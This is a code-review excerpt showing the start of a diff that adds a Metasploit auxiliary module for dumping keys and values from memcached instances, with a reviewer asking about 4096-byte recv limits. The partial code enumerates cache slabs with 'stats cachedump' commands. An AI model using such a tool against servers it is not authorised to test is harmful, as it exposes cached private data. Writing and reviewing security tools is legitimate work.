modules/auxiliary/gather/memcached_extractor.rb

```diff
@@ -0,0 +1,94 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+  include Msf::Exploit::Remote::Tcp
+  include Msf::Auxiliary::Report
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'          => 'Memcached Extractor',
+      'Description'   => %q(
+        This module extracts the slabs from a memcached instance.  It then
+        finds the keys and values stored in those slabs.
+      ),
+      'Author'       => [ 'Paul Deardorff <paul_deardorff[at]rapid7.com>' ],
+      'License'      => MSF_LICENSE
+    ))
+
+    register_options(
+      [
+        Opt::RPORT(11211)
+      ], self.class)
+  end
+
+  # Returns array of keys for all slabs
+  def enumerate_keys
+    keys = []
+    enumerate_slab_ids.each do |sid|
+      sock.send("stats cachedump #{sid} 100\r\n", 0)
+      data = sock.recv(4096)
```

Comment:
I forget how ```recv``` functions in this case, but here and elsewhere where you are using 4096, what if there is more than 4096 bytes of data?